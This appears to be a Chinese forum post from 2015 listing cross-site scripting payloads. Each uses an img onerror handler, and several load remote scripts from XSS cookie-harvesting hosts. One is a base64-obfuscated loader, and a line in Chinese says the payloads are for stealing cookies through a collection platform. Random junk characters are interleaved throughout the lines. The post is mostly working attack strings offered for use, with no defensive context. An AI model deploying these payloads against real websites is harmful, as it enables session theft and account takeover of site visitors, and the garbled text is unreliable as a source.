<img src='non-exist.jpg'onerror="alert('xss')">4 T$ k4 I( q9 r; z
<img src=# onerror=alert(123)>
8 p( L' M5 K2 y7 u4 u<img src=# onerror=alert(document.cookie)>! A5 [1 j1 Z2 s: y& m) k; l3 H; e7 G
下面是利用平台钓cookie的
" P5 z. U# v$ `) E/ I3 { <img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
2 K" d9 ?! S6 X
4 }2 U9 g- S/ ^7 k0 t- m# S7 ^7 f r# }- s/ {: { H
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>. ?- v R( j+ G1 e; w; ]
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
/ ]' J& A% w5 }7 {, N“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
4 Y/ ^9 ^; H: J0 M% ?) [% h5 G- d% [<img src=1 onerror=jQuery.getScript("//xss.re/974")> . z2 F; c4 E2 P/ e$ o8 \2 J
<img src="#">: E- g& l6 g: c: z
<img src="#">7 g7 k6 q2 x- k& q
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>1 |. s2 G5 ^- n; `% n8 T9 R9 n
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">/ L( F: S7 v9 m+ d7 ~' e2 T6 P- M- h$ l
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
1 x) C/ \1 m4 ^, f<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
% R k) t' O, P0 b! _, }% T<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>. l% I, g8 ~2 N6 ]
<img src=x width="0" height="0"></img>
) y9 E( `$ g( i9 G3 S5 ]<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
- ?: p. p3 `# U8 Y. L7 ]( O<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>, T8 p, O# b: ?( `# K
|
发表于 2015-10-18 14:33:54
收藏
支持
反对